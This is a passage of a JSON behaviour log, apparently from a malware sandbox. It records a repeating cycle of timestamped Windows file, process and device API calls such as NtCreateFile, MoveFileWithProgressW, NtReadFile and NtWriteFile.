"filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,326", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:44,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:44,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,426", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,456", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,466", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,466", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,476", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,476", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:44,476", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,486", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,486", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,496", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,496", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,506", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,506", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,516", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,516", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,526", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,526", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,536", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,546", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,546", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,556", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,556", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,566", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,566", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,566", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,576", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,576", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,586", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,596", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,596", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,606", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,606", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:44,616", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,616", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,616", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,626", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,626", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,636", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,636", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,656", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:44,656", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,666", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,676", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,676", "api": "NtFreeVirtualMemory"}, {"category": 
